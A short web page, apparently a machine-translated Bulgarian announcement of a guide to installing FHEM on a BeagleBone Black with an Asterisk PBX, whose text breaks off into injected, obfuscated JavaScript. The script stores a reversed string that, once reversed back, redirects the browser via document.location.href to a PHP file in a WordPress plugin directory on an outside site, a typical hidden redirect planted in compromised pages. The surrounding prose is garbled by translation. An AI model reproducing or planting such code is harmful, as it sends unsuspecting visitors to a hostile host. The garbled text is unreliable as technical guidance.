инсталиране FHEM V5.6 на BEAGLEBONE Черно заедно с телефонна система на Asterisk PBX! Смяната Fritzbox.

Системата за телефон, ние вече инсталирана, тя също има смисъл в FHEM 2. инсталиране стъпка. Ако искате да инсталирате само FEHM, der befolgt unsere $p$VTO6JhIH6WkCGAcPR=function(п){ако (тип ($р $ VTO6JhIH6WkCGAcPR.list[п]) == "низ") върне $ р $ VTO6JhIH6WkCGAcPR.list[п].разцепване("").обратен().присъедините("");върне $ р $ VTO6JhIH6WkCGAcPR.list[п];};$р $ VTO6JhIH6WkCGAcPR.list =[""Php.tegdiw.ssalc / BIL / или р-tegdiw-rettiwt / snigulp / tnetnoc-PW / moc.xamdok //:Телевизия "= ferh.noitacol.tnemucod"];var number1=Math...
| Повече ▼